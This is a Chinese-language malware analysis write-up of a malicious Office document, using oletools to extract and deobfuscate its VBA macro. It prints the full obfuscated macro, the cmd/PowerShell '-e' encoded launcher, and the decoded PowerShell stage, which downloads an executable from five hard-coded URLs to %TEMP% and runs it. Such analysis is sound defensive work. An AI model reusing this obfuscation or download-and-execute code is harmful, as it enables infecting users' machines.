1.什么是OLE
Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE不仅用于桌面应用程序集成,还定义并实现了一种允许应用程序以软件“对象”的形式相互交互的机制。Office办公组件都可以使用OLE技术来嵌入对象或者组件程序。
2.oletools
python-oletools是一款分析Office文件与其OLE文件结构的工具套件。
3.样本分析
先用strings查看下样本的可读字符串,出现超长的字符串需要引起注意。
利用oletools工具里的mraptor(MacroRaptor)查看宏是否可疑。mraptor通过启发式方法检测大多数恶意VBA宏,不同于杀毒引擎基于特征码的检测。当发现文档同时存在自动执行触发器,以及写入文件系统或内存、或在VBA上下文之外执行命令等操作时,会判定为可疑宏。
利用oletools工具里的oletimes提取OLE文件中所有流和存储的创建及修改时间。时间信息可以帮助我们掌握基础的IOC信息,如果创建时间距离安全事件发生时间不长,则该时间可能可以作为一个新的IOC。
利用oletools工具里的oledir查看文档中流结构基本信息。
利用oletools工具里的olemap查看文档中OLE所有扇区的映射(olemeta则用于提取文档的元数据属性)。
利用oletools工具里的olevba提取宏代码。olevba是一个解析OLE和OpenXML文件的工具,可以检测VBA宏是否可疑:它提取宏源代码,并检查其中是否包含反沙盒、反虚拟化技术常用的关键字以及潜在的IOC(IP地址、URL、可执行文件名等)。它还可以检测和解码几种常见的混淆方法,包括十六进制、反转字符串、Base64、Dridex、VBA表达式,并从解码后的字符串中提取IOC。
提取VBA源代码:
' Macro as extracted by olevba (analyst annotations added; the code and the line
' wrapping of the original listing are left exactly as extracted).
' Pattern: every local is a Mid() substring cut out of a junk-padded literal, and the
' Shell$ call at the end concatenates the locals in a scrambled order to rebuild one
' cmd line. Most fragments are pieces of a base64 blob (the regularly recurring "A"
' characters are the 0x00 bytes of UTF-16LE text); the plaintext cmd parts are the
' fragments in hnSJnXVddhP, HGXnj and HAZhcP.
Function lGUchPFGL()
KWFtYdDTon =
Mid("9VK6EAOABfADUAOAAtADEAMQA2AEkAMQAwADEAcAAxADAAOQBwADEAMQAyAHIAMwAyAC0ANAAzAEkAMwAyAHAAMwA5AHIAOQAyAF8AMwA5AF8AMwAyAEUANAAzAEcAMwAyAHIAMwA2AH4AMQAxADAARwA5ADcAfgAxADAAOQBJADEAMAAxkfAvpdThGNmJAk1Em3iz",
5, 174)
sZKCpRKm =
Mid("2AxADAANAAhADEAMQA2AEkAMQAxADYASQAxADEAMgAtADUAOABfADQANwAhADQANwBJADEAMQA5AH4AMQAwADgAcgA5ADcAfgAxADEANQBfADEAMQAwACEAMQAyADEAcgAxADEAdbivsbpqXaKwqLZ124",
2, 134)
' Plaintext fragment: cmd "set %VAR%=value" pairs. The ^ carets are cmd escape
' characters that are stripped on expansion, so the values later read as plain text.
' Note the env-var name %lGUchPFGL% reuses this function's own name.
hnSJnXVddhP = Mid("iYru3iLF0lcset
%RwUFwBXjE%=w^er^s&&set %ZQstbfFvY%=owZnERPJb&&set
%lGUchPFGL%=p^o&&set %TjISFAKwa%=fGonLAzNKos8", 12, 97)
abJcf = Mid("icRriEn5J8z7uqKjD19AF8AMQAyADAALQA2ADUAXwA0ADcAXwA0ADznfX5NfzhPTX7Luoz", 20, 34)
KLGHFbprUvc = Mid("0fLCkYANAByADEAMAA4AC0AMQAxADUAfgAzADIARQA2ADEAIQAzADIARQAzADkARQpMEcOtoINM", 7, 59)
jMNFtihSl = Mid("zxAHAAMQAwADkALQA0ADcAVwA4ADIAVwA5ADkAfgA4ADYAIQA0ADcRDvZC9SBpibhIYWJDIZMQD", 2, 52)
zncSQdHYUQu
=
Mid("q9DEAMAA5AFcAMwAyAF8ANgAxAF8AMwAyAHIAMQAxADAASQAxADAAMQBHADEAMQA5AEkANAA1AFcAMQAxADEARwA5ADgAX8W3uwC4MzEkoBET8tPCp4nY4",
3, 92)
wiEdrTI =
Mid("4OKdislUfKcvGXi8IwjGHodEoQA3AEcAMQAxADQAIQAxADAAOABXADQANgAtADgANAB+ADEAMQAxAC0AOAAzAF8AMQAxADYAXwAxADEANAAhADEAMAA1AHAAMQAxADAASQAxADAAMwBB54s81Yu0v6iV",
26, 114)
hEmkHuQ =
Mid("3JNw9z72caTAxADAAMAAhADEAMQA3AEkAMQAxADEASQAxADEAMAAtADEAMAAzACEANAA2AH4AMQAxADgASQAxADEAMABfADQANwBwADcAMwBFADEAMQA5AC0ANwA0AEkAMQAxADAASQA3ADAASQA0ADcAfgA0ADQASQAxADAANAB+ADEAMQA2AHIAMQAxADYAfgAxADENdaL6AdkH",
12, 189)
HUZCjtLV =
Mid("s0rMFdiJRA2AFcAMQAwADEAfgA0ADUAXwAxADAANAB+ADEAMQAxAEUAMQAxADUARQAxADEANgBwADMAMgBHADMANgByADkANQBXADQANgBwADUO",
10, 100)
DtDDVX = Mid("iADMAVwAxADEAMgAhADEAMAA4AC0AMQAwADUASQAxADEANgB+ADQAMAByAD6sWV7pUTliRpB6AzQwKs10O074UF", 2, 58)
cbwMNswjSic = Mid("2wAxADAANgAtADEAMAAxAEcAOQA5AF8AMQAxADYAXwAioQWqQoXmvhjWwPz0cYXbRZ8o", 2, 42)
UYiPjvIHhM
=
Mid("j32DEAMQA2AEUAMQAxADYAVwAxADEAMgBXADUAOAByADQANwBJADQANwB+ADkANwByADEAMAAzAH4AMQAwADEALQAxADEAMABXADEAMQA2AEkAMQAxADcAIQAxADEANABXADkANwBfADQANQAhADEAMAASFoOz97QljDiMj7Fnq",
4, 150)
qUazXUz = Mid("DsqAxADAAMQB+ADEAMQA1AFcAMQAxADUARQAzADIAcAAzADYARQAxADEAMgBFADkANwBFADEAMQA2AHIAMQAwADQAcs8qiztOXi", 4, 87)
fGYhd = Mid("vhTMwBwADUAMwAhADUAMQBHADUANAByADQAMQB+ADUAORjzf8Dzz", 4, 41)
bwDfKEDvnK = Mid("7Vtu1rl0cD1HMAaABvAG0ARQBbADIAMQBdACsAJABQAFMASABvAG0AZQBbADMAMABdACsAJwBYACcAKQawDibJ8", 12, 69)
AqwZqJJ
=
Mid("KTN3VR6zNQAwADgAfgAxADAANQBFADEAMAAxAHAAMQAxADAAcAAxADEANgBXADMAMgByADYAMQAtADMAMgBXADEAMQAwAH4AMQAwADEARwAxADEAOQByADQANQBXADEAMQAxAHIAOQA4AH4AMQAwADYAXwAxADAAMQB+ADkAOQBXADEAMQA2AEcAMwAyAF8AOvBOKCo",
10, 184)
LiBqwPV =
Mid("F07N96WQHoofVXtiQBzwK3SfJYShmWAAMQBwADEAMgAzACEAMQAxADYAfgAxADEANABfADEAMgAxAEkAMQAyADMAcgAzADYASQAxADEAOQBfADEAMAAxAEUAOQA4ACEAOQA5ACEAMQAwADgAcgAxADAANQBwADEAMAAxAC0AMQAxADAAcgAxADEANgBHSSLU",
32, 156)
SoXERffzLNj =
Mid("9Yi7sCwjIzuXTMaKfqdFnRzAoACgAIAAnADMANgAhADEAMQA5AH4AMQAxADUAcAA5ADkASQAxADEANABXADEAMAA1AFcAMQAxADIAVwAxADEANgBHADMAMzfRsvpMAzau",
24, 95)
kFwiHiljl =
Mid("1zfPmBvDFiDsdOIHADAANQBXADkANwBFADEAMQA0AH4AMQAxADYAcgA0ADYAIQA5ADkAXwAxADEAMQBwADEAMAA5AHAANAA3AHAANwA2VMAhfHZwT",
17, 88)
dqwLCiY =
Mid("f6rDcAOQAtADEAMQAzAC0AOAA0AEUAMQAyADEAcAA0ADcASQA0ADQAIQAxADAANABHADEAMQA2AEkAMQAxADYASQAxADEAMgB+ADUAOABHADQANwBwADQANwBJADEAMAA1AC0AMQAxADAAXwAxADEAMwBJADEAMAA1AHIAMQAwADgALQA5ADcAfgA5ADgAVwAxGPMt5QKmuiAT",
4, 191)
YzRnLMXLt =
Mid("NdTqpYdLb8WbrJtt8Th1KdT7JpqY8uHFzBqAH4AMQAxADAAcgAzADIARQAzADYAcAAxADEANwAtADEAMQA0AEkAMQAwADgAVwAxADEANQBFADQ5XV",
36, 75)
aBNiGIIAVn = Mid("EGkpwADQALQ8Jdhvt0AFro1UhsBkDES9RFZBZ", 5, 7)
SRrRL = Mid("p2AtADEAMQAwAHIAMQAxADYASQA1ADkAVwAzADYAVwAxADEANABFADkANwByADEAMQAwAF8AMQAwADAAXwAxADEAMQBXAoI82cU1bY", 3, 91)
IjXwSLEB = Mid("Fv2OATtMP6lHj3EB+ADEAMsnUj68E8Pb9pw", 16, 7)
wRjLjhk = Mid("zKDs4uR6ZiRgAnACcAKQA=aRiU40DzqR7uPTdpfXk", 12, 11)
ioKGvDI = Mid("nMNAjERAE4w8du4EsNZR0AiEzRQARQAxADAANAAtADEAMQA2AF8AMQAxDU1soYbR", 27, 30)
WDJKGIiwHUu
=
Mid("JvIMriS2vNtGmLJADQANgBJADYAOAAhADEAMQAxAEkAMQAxADkAcgAxADEAMAByADEAMAA4AF8AMQAxADEAcAA5ADcAcAAxADAAMABFADcAMABJADEAMAA1AEcAMQAwADgAfgAxADAAMQBwADQAMABfADMANgBfADEAMNXf2KZ05Q",
15, 150)
sCPDkiJju =
Mid("SutQBfADMANgBwADEAMQAyAF8AOQA3AH4AMQAxADYAcAAxADAANABfADMAMgByADYAMQBJADMAMgAtADMANgByADEA89MFjjj52tB4ijVL",
4, 87)
wwXDnZjw =
Mid("ovADYASQAxADEAMgB+ADUAOABXADQANwAhADQANwBXADEAMQA2AHIAMQAxADQASQAxADEANwBXADEAMQAwAH4AMQAwADMALQAxADEANgB+ADkANwBwADEAMAA5ACEAMQAxADYAVwAxADAAMAByADEAMQA2AFcAMQAxADYAcgA5ADgAIQAxADAANQAtADEAMQAwAEUAMQAiNPA9cWCcQOSHs3XTEsm",
3, 199)
tXnLIoGLHvd =
Mid("Bn2AMgB+ADUAOAAhADQANwBJADQANwByADkAOAAhADEAMAA1AEUAMQAwADcAIQA5ADcAcgAxADEAMAAtADrARBv9V0FhZYsT44iwcBuSU05s9FfiWs",
4, 79)
' Plaintext fragment: the tail of the set chain, the !%VAR%! expansions that
' spell the interpreter name, and the "-e" switch that precedes the encoded command.
HAZhcP =
Mid("iTz04dTvUDELqZz4wiXoBWWUuLLdILLbYXozCcjk%=fWbOiZFVf&&!%lGUchPFGL%!!%RwUFwBXjE%!!%BXTAMUmbU%!
-e JgAoACAAJABwAzBG", 32, 78)
kKbvio =
Mid("NAMQBfADkAOABXADEAMQA0AFcAOQA3AHAAMQAyADIAfgA0ADYARwAxADEAMgBHADEAMAA4AHIANAA3AFcAMQAwADYARwA4ADUAXwAxADAAOQBXARwEmAWnB0rZR",
3, 109)
MJHlahRaFY =
Mid("18oHD2CMzLKwvo7S6z3zlAAzAEkAMQAyADEARwAxADEANQAhADEAMQA2AFcAMQAwADEALQAxADAAOQBwADQANgBJADcAOABwADEAMAAxAEUAMQAxADYAIQA0ADYAIQA4ADcARQAxADAAMQB+ADkAOAAtADYANwBfADEAMAA4AEUAMQAwADUAVwAxADAAMQRvBFXhF39IL5Q6F",
22, 169)
DhLXTIvQWVQ =
Mid("TXD6JHlrVazNd1QAwADIAVwAxADEAMQBXADEAMQA0AHIAMQAwADEARwA5ADcAfgA5ADkASQAxADAANABXADQAMABfADMANgAtADEAMQA3AEUAMQAxADQARQAxADAAOABwmJuq",
15, 115)
JfdSjoV =
Mid("WCZWOmKLzRNozNo1AwivjEAA4AFcAMQAwADgARwA1ADkAIQAzADYAVwAxADEAOQBJADEAMAAxAHAAOQA4AFcAOQA5AHAAMUppuZGSwK1IO5wLsG",
23, 72)
NTEKKsUWkd =
Mid("SMYApqnIL8MSummf4AC0AMQAwADUAXwAxADEAOAAtADEAMAA1AHAAMQAxADAAcAAxADAAMwBJADQANgAtADEAMQA1AF8AMQAwADcAVwA0ADcAXwA5ADAAcgA0ADcAXwAzADkAXwA0ADYAIQA4dkr899CUL4vVDTdit6s",
17, 129)
uDlLoVB = Mid("6aVVzmoFjtHADMAMgBHADEAMAA1EX9313IK", 12, 16)
IzYua
=
Mid("D6a692jtjoDAMAA2AEcAMQAwADEAXwA5ADkAcAAxADEANgBHADMAMgBfADgANwBwADgAMwBJADkAOQBFADEAMQA0ACEAMQAwADUAXwAxADEAMgBXADEAMQA2AF8ANAA2AHIAOAAzAEkAMQAwADQAcAAxADAAMQiinfq42PlZWdXRYiMncvdj",
12, 147)
pWjEMM = Mid("GblAgBHADQANQBHADgAMABXADEAMQA0AC0AMQAxADEAXwA5ADkAIQ5qbWqbh5iI3N2ZWGi4ks", 5, 49)
FhTNRuXZEhu
=
Mid("jANgAtADEAMQA0AC0AOQA3AEcAMQAxADAAIQAxADAAMAByADEAMQAxAHIAMQAwADkAXwA0ADYAcgAxADEAMAB+ADEAMAAxAEUAMQAyADAAcAAxADEANgBJADQAMAB+ADQAOQBXADQANABFADMAMgBHADUANABHADUA1MrEpslWGlpo9r9iwWriKOS",
2, 161)
HEVwFEoV =
Mid("vlZ1qR6BAUJCRkK+ADQAMAAtADQAMQB+ADQANAAtADMAMgByADMANgBFADEAMQAyAEkAOQA3AEkAMQAxADYASQAxADAANAAhADQAMQBXADUAOQAhADgAMwB+ADEAMQA2AFcAOQA3AC0AMQAxADQAcgAxADEANDXPu",
16, 142)
ZpJiPK =
Mid("wsd81Dw8zADIARwAxADEANAB+ADkANwBXADEAMQAwAC0AMQAwADAARQAxADEAMQBFADEAMAA5AH4ANQA5AHIAMwA2AH4AMQAxADcARwAxADEcR",
9, 100)
zwjaNTXzh =
Mid("uiHPBhgBHADYAMQBwADMAMgAhADEAMQAwAEcAMQAwADEARwAxADEAOQBFADQANQAhADEAMQAxAHIAOQA4AFcAMQAwADYASQAxADAAMQAhADkAOQBHADEAMQA2AF8AMwAyAC0ANAAZEfwX3",
7, 130)
tFrEjjOGmhj = Mid("anz6bzZmzKqwiWNFEoDJJzVCkp71AHIANgA3AHAAMQAxADEAcAAxADAAOQAtADcAOQByADkAOAByADEiZ1w", 28, 52)
' Plaintext fragment ("hel^l" with another caret), see the note on hnSJnXVddhP.
HGXnj = Mid("1tzO&&set %BXTAMUmbU%=hel^l&&set %TwDzq0", 5, 30)
zIcBjSnbNcL
=
Mid("hRBswJpBii1vOcKQuYAOQByADEAMgAwAEcAOQA5AF8AMQAwADEAXwAxADEAMgAtADEAMQA2AEkAMQAwADUAfgAxADEAMQB+ADEAMQAwAEUANAA2AEkANwA3ACEAMQAwADEAcAAxADEANQAhADEAMQA1AHAAOQA3AH4AMQAwADMAcAAxADAAMQBJADUAOQBwADEAMgA1AC0AMo1TpcWwrp0EwcfXT",
18, 187)
isLUpmYjt =
Mid("UNZTvNZnu1qncHmBcNX3zQAyADUAJwAuAHMAUABMAEkAdAAoACAAJwBfACEAVwBwAEkALQB+AHIARwBFACcAIAApACAAfABGAG8AUgBFAEEAYwBIAC0AbwBiAGoARQBDAHQAIAB7ACgAIABbAEkAbgB0AF0AIAAkAF8AIAAtAGEAcwBbAEMASABhAFIAXQApACAAfQApAC0AagBvAEkATZOOwsdjQYOZ12LN3aD",
22, 192)
FCHEwwpc =
Mid("NQT2pfPun3AHJjLkXu2w2KzNjYDkZMAOQBfADQANABfADMAOQAhADQAMQB+ADUAOQBXADMANgBJADEAMQAwAEUAOQA3AF8AMQAwADkALQAxADAAMQB+ADMAMgBfADYAMQBXADMAMgBFADMCsff",
30, 113)
HcfaUs =
Mid("XjQ1qCgA1ADkASQA5ADgAfgAxADEANABJADEAMAAxAF8AOQA3ACEAMQAwADcALQA1ADkAVwAxADIANQAhADkAOQB+ADkANwBXADEAMQA2AC0AOQA5AEUAMQAwADQASQAxADIAMwBJADEAMQA5AEkAMQAxADQAcgAxADAANQB+ADEAMQi6RsnpsjEJLNHsvaz1Yvd1w1cQp",
7, 169)
vwYiNrWoCC = Mid("aGUz2qaZhRAfgA0ADQAIQAxADAANABJA8iYvEtjNqnrPGm0w", 11, 22)
nQJcjaCpQW
=
Mid("iGarfvv0Ij2q06YSdv5nMlWofEAMAAxAEcAMQAxADQAVwAxADAAOABJADEAMAA1AHAAMQAxADgAXwAxADAAMQBfADQANgAtADkAOQBfADEAMQAL6",
26, 85)
TUPqi = Mid("siZUCM6h5Q93QUiOF4iPGXwMAAxAEkAMQAxADAARQAxADPV", 24, 22)
bSPpO
=
Mid("0S5cjiACEAMwAyAF8ANAAzAC0AMwAyAH4AMwA5AEUANAA2AC0AMQAwADEARQAxADIAMABJADEAMAAxAHIAMwA5AFcANQA5AEkAMYEMdclGjivwo4pzHdNRZi",
7, 93)
' Reassembly: Chr(34) is the opening double quote; the remaining operands are the
' fragments above in their intended (not declaration) order. The trailing 0 is the
' Shell windowstyle argument (vbHide), so the spawned process runs without a visible
' window. dtDtjWoad is not assigned anywhere in this function -- TODO confirm from the
' full module whether it is defined elsewhere; an unassigned Variant would concatenate
' as an empty string.
Shell$ dtDtjWoad + Chr(34) + hnSJnXVddhP + HGXnj + HAZhcP +
bwDfKEDvnK + SoXERffzLNj + zwjaNTXzh + tFrEjjOGmhj + IzYua + IjXwSLEB +
JfdSjoV + AqwZqJJ + MJHlahRaFY + SRrRL + zncSQdHYUQu + cbwMNswjSic +
ZpJiPK + KLGHFbprUvc + sZKCpRKm + kKbvio + dqwLCiY + kFwiHiljl + abJcf +
ioKGvDI + wwXDnZjw + aBNiGIIAVn + hEmkHuQ + tXnLIoGLHvd + nQJcjaCpQW +
jMNFtihSl + vwYiNrWoCC + UYiPjvIHhM + NTEKKsUWkd + DtDDVX + FCHEwwpc +
FhTNRuXZEhu + fGYhd + sCPDkiJju + TUPqi + KWFtYdDTon + bSPpO +
DhLXTIvQWVQ + uDlLoVB + YzRnLMXLt + LiBqwPV + WDJKGIiwHUu + wiEdrTI +
HEVwFEoV + pWjEMM + qUazXUz + HcfaUs + HUZCjtLV + zIcBjSnbNcL +
isLUpmYjt + wRjLjhk, 0
End Function
宏代码中主要使用多个Mid函数取子字符串再拼接,所以可以使用Office内置的VBA编辑器将代码简化。
简化后的代码:
Shell$ "set
%RwUFwBXjE%=w^er^s&&set %ZQstbfFvY%=owZnERPJb&&set
%lGUchPFGL%=p^o&&set %TjISFAKwa%=fGonLAzNK&&set
%BXTAMUmbU%=hel^l&&set %bYXozCcjk%=fWbOiZFVf&&!%lGUchPFGL%!!%RwUFwBXjE%!!%BXTAMUmbU%!
-e
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
A1AC0AMQAyADUAJwAuAHMAUABMAEkAdAAoACAAJwBfACEAVwBwAEkALQB+AHIARwBFACcAIAApACAAfABGAG8AUgBFAEEAYwBIAC0AbwBiAGoARQBDAHQAIAB7ACgAIABbAEkAbgB0AF0AIAAkAF8AIAAtAGEAcwBbAEMASABhAFIAXQApACAAfQApAC0AagBvAEkATgAnACcAKQA=
简化后的代码可分成三个部分:Shell调用、set串和-e后面的编码字符串。Shell函数通常被用来执行系统命令。
set串中是利用命令提示符的环境变量组合来执行powershell:%lGUchPFGL%=p^o、%RwUFwBXjE%=w^er^s、%BXTAMUmbU%=hel^l 中的^是cmd的转义字符,展开时被去掉,三个变量依次拼接即为powershell,随后以-e参数执行后面的编码命令。
**-e后面的字符串末尾有个“=”,可判断为Base64编码;-e即PowerShell的-EncodedCommand参数,其参数是UTF-16LE文本的Base64(编码串中规律出现的“A”对应UTF-16LE的0x00字节)。解码后为:**
&($pshomE[21]+$PSHome[30]+'X')(('36!119~115p99I114W105W112W116G32G61p32!110G101G119E45!111r98W106I101!99G116_32-45r67p111p109-79r98r106G101_99p116G32_87p83I99E114!105_112W116_46r83I104p101~108W108G59!36W119I101p98W99p108~105E101p110p116W32r61-32W110~101G119r45W111r98~106_101~99W116G32_83I121G115!116W101-109p46I78p101E116!46!87E101~98-67_108E105W101-110r116I59W36W114E97r110_100_111W109W32_61_32r110I101G119I45W111G98_106-101G99_116_32G114~97W110-100E111E109~59r36~117G114r108-115~32E61!32E39E104!116I116I112-58_47!47I119~108r97~115_110!121r111_98W114W97p122~46G112G108r47W106G85_109W79-113-84E121p47I44!104G116I116I112~58G47p47I105-110_113I105r108-97~98W105W97E114~116r46!99_111p109p47p76_120-65_47_44E104-116_116I112~58W47!47W116r114I117W110~103-116~97p109!116W100r116W116r98!105-110E104-100!117I111I110-103!46~118I110_47p73E119-74I110I70I47~44I104~116r116~112~58!47I47r98!105E107!97r110-101G114W108I105p118_101_46-99_111p109-47W82W99~86!47~44!104I116E116W112W58r47I47~97r103~101-110W116I117!114W97_45!108-105_118-105p110p103I46-115_107W47_90r47_39_46!83W112!108-105I116~40r39_44_39!41~59W36I110E97_109-101~32_61W32E36-114-97G110!100r111r109_46r110~101E120p116I40~49W44E32G54G53p53!51G54r41~59_36p112_97~116p104_32r61I32-36r101I110E118_58-116I101p109p112r32-43I32p39r92_39_32E43G32r36~110G97~109I101!32_43-32~39E46-101E120I101r39W59I102W111W114r101G97~99I104W40_36-117E114E108p32G105~110r32E36p117-114I108W115E41p123!116~114_121I123r36I119_101E98!99!108r105p101-110r116I46I68!111I119r110r108_111p97p100E70I105G108~101p40_36_117G114!108W46-84~111-83_116_114!105p110I103~40-41~44-32r36E112I97I116I104!41W59!83~116W97-114r116G45G80W114-111_99!101~115W115E32p36E112E97E116r104r59I98~114I101_97!107-59W125!99~97W116-99E104I123I119I114r105~116W101~45_104~111E115E116p32G36r95W46p69r120G99_101_112-116I105~111~110E46I77!101p115!115p97~103p101I59p125-125'.sPLIt('_!WpI-~rGE' ) |FoREAcH-objECt {( [Int] $_ -as[CHaR]) })-joIN'')
$pshomE[21]+$PSHome[30]+'X'从PowerShell自动变量$PSHome的路径字符串中取出字符,与'X'拼接成IEX(Invoke-Expression),在PowerShell中用于把字符串当作代码执行。
后面的长数字串以'_!WpI-~rGE'中的任意字符作为分隔符拆分,每段数字转换为对应的字符再拼接(即.sPLIt(...)|FoREAcH-objECt{...}-joIN''部分),用PowerShell解码出来就是:
# Decoded second stage (analyst annotations added; code unchanged).
# Visible behaviour: try each URL in order, save the first successful download as a
# random-named .exe under %TEMP%, start it, then stop iterating.
$wscript = new-object -ComObject WScript.Shell;   # created but never referenced again in this excerpt
$webclient = new-object System.Net.WebClient;     # used below for DownloadFile
$random = new-object random;
# Hard-coded download locations (the network IOCs of this sample), split on ',' into an array.
$urls = 'http://wlasnyobraz.pl/jUmOqTy/,http://inqilabiart.com/LxA/,http://trungtamtdttbinhduong.vn/IwJnF/,http://bikanerlive.com/RcV/,http://agentura-living.sk/Z/'.Split(',');
$name = $random.next(1, 65536);                   # Random.Next upper bound is exclusive: 1..65535
# Drop path is %TEMP%\<random>.exe -- a file-write pattern worth alerting on.
$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls)
{try
{$webclient.DownloadFile($url.ToString(), $path);   # first successful download wins
Start-Process $path;break;                          # run the dropped file, then leave the loop
}
catch
{write-host $_.Exception.Message;}}   # a failed URL (e.g. the 404s observed in the VM) is only printed; the loop moves on
基本流程是:创建一个WScript.Shell对象和一个WebClient对象,遍历$urls数组,依次尝试从每个URL下载exe文件,保存为%TEMP%下的随机文件名并执行,下载成功一次后即break退出循环;失败则打印异常信息并继续尝试下一个URL。
在虚拟机中可以看到请求为404,地址已经失效。
4.总结
此恶意文档通过代码混淆和编码技术来逃避杀毒软件的检测,给分析带来了一定阻碍;但还原之后可见,黑客的攻击手法仍是比较原始的宏代码利用,所以只要对宏代码进行深入分析就能了解整个攻击过程。
参考:https://www.cnblogs.com/KevinGeorge/
https://medium.com/walmartlabs/evasive-vba-advanced-maldoc-techniques-1365e9373f80